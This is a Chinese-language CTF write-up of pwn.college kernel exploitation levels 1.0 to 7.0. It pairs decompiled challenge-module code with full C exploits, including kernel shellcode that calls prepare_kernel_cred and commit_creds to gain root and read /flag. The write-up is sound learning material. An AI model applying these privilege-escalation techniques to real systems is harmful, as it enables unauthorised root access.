经典的 LKM 结构，加载的时候调用 init_module，移除的时候调用 cleanup_module，init_module 里面打开了 /flag 并写入内核空间的 buffer，然后通过 proc_create 创建了 /proc/pwncollege，提供了 device_open，device_write，device_read，device_release，我们发现 device_write 里面实现了如下状态机：

1
ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
2
{
3
  size_t n16; // rdx
4
  char password[16]; // [rsp+0h] [rbp-28h] BYREF
5
  unsigned __int64 v8; // [rsp+10h] [rbp-18h]
6

7
  v8 = __readgsqword(0x28u);
8
  printk(&unk_810);
9
  n16 = 16;
10
  if ( length <= 0x10 )
11
    n16 = length;
12
  copy_from_user(password, buffer, n16);
13
  device_state[0] = (strncmp(password, "ucihjkpyaybhjjsf", 0x10u) == 0) + 1;
14
  return length;
15
}

如果我们写入密码 ucihjkpyaybhjjsf，device_write 就会将 device_state[0] 设置为 2，继续看 device_read 函数：

1
ssize_t __fastcall device_read(file *file, char *buffer, size_t length, loff_t *offset)
2
{
3
  const char *flag; // rsi
4
  size_t length_1; // rdx
5
  unsigned __int64 v8; // kr08_8
6

7
  printk(&unk_850);
8
  flag = flag;
9
  if ( device_state[0] != 2 )
10
  {
11
    flag = "device error: unknown state\n";
12
    if ( device_state[0] <= 2 )
13
    {
14
      flag = "password:\n";
15
      if ( device_state[0] )
16
      {
17
        flag = "device error: unknown state\n";
18
        if ( device_state[0] == 1 )
19
        {
20
          device_state[0] = 0;
21
          flag = "invalid password\n";
22
        }
23
      }
24
    }
25
  }
26
  length_1 = length;
27
  v8 = strlen(flag) + 1;
28
  if ( v8 - 1 <= length )
29
    length_1 = v8 - 1;
30
  return v8 - 1 - copy_to_user(buffer, flag, length_1);
31
}

如果 device_state[0] == 2 就将内核中的 flag 写入到用户态的 buffer 中。

最后庆祝一下人生中第一道 kernel（

Exploit#

1
#include <fcntl.h>
2
#include <string.h>
3
#include <unistd.h>
4

5
#define FLAG_LENGTH 0x100
6

7
char password[] = "ucihjkpyaybhjjsf";
8
char flag[FLAG_LENGTH];
9

10
int main(int argc, char *argv[]) {
11
  int fd = open("/proc/pwncollege", O_RDWR);
12

13
  write(fd, password, strlen(password));
14
  read(fd, flag, FLAG_LENGTH);
15
  write(STDOUT_FILENO, flag, FLAG_LENGTH);
16

17
  return 0;
18
}

Level 2.0#

Information#

Category: Pwn

Description#

Ease into kernel exploitation with another crackme level.

Write-up#

输密码，密码对了就成了。

Exploit#

1
#include <fcntl.h>
2
#include <string.h>
3
#include <unistd.h>
4

5
char password[] = "zcexibhdcclcottw";
6

7
int main(int argc, char *argv[]) {
8
  int fd = open("/proc/pwncollege", O_WRONLY);
9

10
  write(fd, password, strlen(password));
11

12
  return 0;
13
}

Level 3.0#

Information#

Category: Pwn

Description#

Ease into kernel exploitation with another crackme level, this time with some privilege escalation (whoami?).

Write-up#

白给的提权函数，提权后再 cat /flag 就好了。

Exploit#

1
#include <fcntl.h>
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <string.h>
5
#include <unistd.h>
6

7
char password[] = "tzrfzpifnzshksnp";
8

9
int main(int argc, char *argv[]) {
10
  int fd = open("/proc/pwncollege", O_WRONLY);
11

12
  printf("Current UID: %d\n", getuid());
13
  write(fd, password, strlen(password));
14
  printf("Current UID: %d\n", getuid());
15
  system("cat /flag");
16

17
  return 0;
18
}

Level 4.0#

Information#

Category: Pwn

Description#

Ease into kernel exploitation with another crackme level and learn how kernel devices communicate.

Write-up#

这次提供的是 device_ioctl，即我们需要通过 ioctl 函数来操作设备。

1
__int64 __fastcall device_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
2
{
3
  __int64 result; // rax
4
  int v5; // r8d
5
  char password[16]; // [rsp+0h] [rbp-28h] BYREF
6
  unsigned __int64 v7; // [rsp+10h] [rbp-18h]
7

8
  v7 = __readgsqword(0x28u);
9
  printk(&unk_328, file, cmd, arg);
10
  result = -1;
11
  if ( cmd == 1337 )
12
  {
13
    copy_from_user(password, arg, 16);
14
    v5 = strncmp(password, "qyikgpxrxvcinxbe", 0x10u);
15
    result = 0;
16
    if ( !v5 )
17
    {
18
      win();
19
      return 0;
20
    }
21
  }
22
  return result;
23
}

Exploit#

1
#include <fcntl.h>
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <sys/ioctl.h>
5
#include <unistd.h>
6

7
#define REQUEST 1337
8

9
char password[] = "qyikgpxrxvcinxbe";
10

11
int main(int argc, char *argv[]) {
12
  int fd = open("/proc/pwncollege", O_WRONLY);
13

14
  printf("Current UID: %d\n", getuid());
15
  ioctl(fd, REQUEST, password);
16
  printf("Current UID: %d\n", getuid());
17
  system("cat /flag");
18

19
  return 0;
20
}

Level 5.0#

Information#

Category: Pwn

Description#

Utilize your hacker skillset to communicate with a kernel device and get the flag.

Write-up#

device_ioctl 把 arg 当函数执行了，由于没开 kASLR, 所以可以直接通过 lsmod 得到 module 的加载基地址，用它加上模块内函数地址作为 arg 传入即可。

1
__int64 __fastcall device_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
2
{
3
  __int64 result; // rax
4

5
  printk(&unk_928, file, cmd, arg);
6
  result = -1;
7
  if ( cmd == 1337 )
8
  {
9
    ((void (*)(void))arg)();
10
    return 0;
11
  }
12
  return result;
13
}

~ # lsmod
challenge 16384 0 - Live 0xffffffffc0000000 (O)

Exploit#

1
#include <fcntl.h>
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <sys/ioctl.h>
5
#include <unistd.h>
6

7
#define REQUEST 1337
8

9
int main(int argc, char *argv[]) {
10
  int fd = open("/proc/pwncollege", O_WRONLY);
11

12
  printf("Current UID: %d\n", getuid());
13
  ioctl(fd, REQUEST, 0xffffffffc0000000 + 0x8BD);
14
  printf("Current UID: %d\n", getuid());
15
  system("cat /flag");
16

17
  return 0;
18
}

Level 6.0#

Information#

Category: Pwn

Description#

Utilize a ‘buggy’ kernel device and shellcode to escalate privileges to root and get the flag!

Write-up#

读入 shellcode，然后执行。

1
ssize_t __fastcall device_write(file *file, const char *buffer, size_t length, loff_t *offset)
2
{
3
  size_t n4096; // rdx
4
  __int64 v6; // rbp
5

6
  printk(&unk_698, file, buffer, length, offset);
7
  n4096 = 4096;
8
  if ( length <= 0x1000 )
9
    n4096 = length;
10
  v6 = copy_from_user(shellcode, buffer, n4096);
11
  ((void (*)(void))shellcode)();
12
  return length - v6;
13
}

~ # cat /proc/kallsyms | grep "prepare_kernel_cred\|commit_creds"
ffffffff81089310 T commit_creds
ffffffff81089660 T prepare_kernel_cred

注意 call 指令需要指定返回到哪里，否则会跑飞。

Exploit#

1
#include <fcntl.h>
2
#include <stdlib.h>
3
#include <unistd.h>
4

5
int main(int argc, char *argv[]) {
6
  int fd = open("/proc/pwncollege", O_WRONLY);
7

8
  unsigned char sc[] =
9
      "\x48\x31\xff"                 // xor rdi, rdi
10
      "\x48\xc7\xc0\x60\x96\x08\x81" // mov rax, 0xffffffff81089660
11
      "\xff\xd0"                     // call rax (prepare_kernel_cred)
12
      "\x48\x89\xc7"                 // mov rdi, rax
13
      "\x48\xc7\xc0\x10\x93\x08\x81" // mov rax, 0xffffffff81089310
14
      "\xff\xd0"                     // call rax (commit_creds)
15
      "\xc3";                        // ret
16

17
  write(fd, sc, sizeof(sc));
18
  system("cat /flag");
19

20
  return 0;
21
}

Level 7.0#

Information#

Category: Pwn

Description#

Utilize a ‘buggy’ kernel device and shellcode to escalate privileges to root and get the flag!

Write-up#

这题用 ioctl，并且改了逻辑，需要按照特定内存 layout 来布置 shellcode 。

第一个 copy_from_user 将 arg 的前八字节当作 shellcode 长度写入 shellcode_length 变量，第二次将 arg + 0x1008 处的八字节写入 shellcode_execute_addr 中，然后第三次则是将 arg + 8 处的 shellcode 写入 shellcode 中，最后执行的是 shellcode_execute_addr[0]，即 arg 指定要读入的 shellcode 的长度，arg + 0x1008 指定要执行的 shellcode 地址，arg + 8 处一共 0x1000 字节空间用于写 shellcode 。

1
__int64 __fastcall device_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
2
{
3
  __int64 result; // rax
4
  size_t shellcode_length; // [rsp+0h] [rbp-28h] BYREF
5
  void (*shellcode_execute_addr[4])(void); // [rsp+8h] [rbp-20h] BYREF
6

7
  shellcode_execute_addr[1] = (void (*)(void))__readgsqword(0x28u);
8
  printk(&unk_11A0, file, cmd, arg);
9
  result = -1;
10
  if ( cmd == 1337 )
11
  {
12
    copy_from_user(&shellcode_length, arg, 8);
13
    copy_from_user((size_t *)shellcode_execute_addr, arg + 4104, 8);
14
    result = -2;
15
    if ( shellcode_length <= 0x1000 )
16
    {
17
      copy_from_user(shellcode, arg + 8, shellcode_length);
18
      shellcode_execute_addr[0]();
19
      return 0;
20
    }
21
  }
22
  return result;
23
}

Exploit#

1
#include <assert.h>
2
#include <fcntl.h>
3
#include <stdint.h>
4
#include <stdlib.h>
5
#include <string.h>
6
#include <sys/ioctl.h>
7
#include <unistd.h>
8

9
#define PACKED __attribute__((packed))
10
#define NAKED __attribute__((naked))
11

12
#define DEVICE_PATH "/proc/pwncollege"
13
#define REQUEST 1337
14

15
typedef struct {
16
  uint64_t sc_size;
17
  uint8_t sc[0x1000];
18
  uint64_t sc_addr;
19
} PACKED payload_t;
20

21
NAKED void escalate(void) {
22
  __asm__ volatile(".intel_syntax noprefix;"
23
                   ".global escalate_start;"
24
                   ".global escalate_end;"
25
                   "escalate_start:;"
26
                   "xor rdi, rdi;"
27
                   "mov rax, 0xffffffff81089660;" // prepare_kernel_cred
28
                   "call rax;"
29
                   "mov rdi, rax;"
30
                   "mov rax, 0xffffffff81089310;" // commit_creds
31
                   "call rax;"
32
                   "ret;"
33
                   "escalate_end:;"
34
                   ".att_syntax;");
35
}
36

37
extern char escalate_start[];
38
extern char escalate_end[];
39

40
static inline size_t get_escalate_size(void) {
41
  return escalate_end - escalate_start;
42
}
43

44
static inline void construct_payload(payload_t *p, uint64_t exec_addr) {
45
  size_t size = get_escalate_size();
46

47
  p->sc_size = size;
48
  memcpy(p->sc, escalate_start, size);
49
  p->sc_addr = exec_addr;
50
}
51

52
int main(void) {
53
  int fd = open(DEVICE_PATH, O_WRONLY);
54
  assert(fd > 0);
55

56
  payload_t payload = {0};
57
  size_t escalate_size = escalate_end - escalate_start;
58

59
  construct_payload(&payload, 0xffffc90000085000ULL);
60

61
  assert(ioctl(fd, REQUEST, &payload) >= 0);
62
  close(fd);
63
  system("cat /flag");
64

65
  return 0;
66
}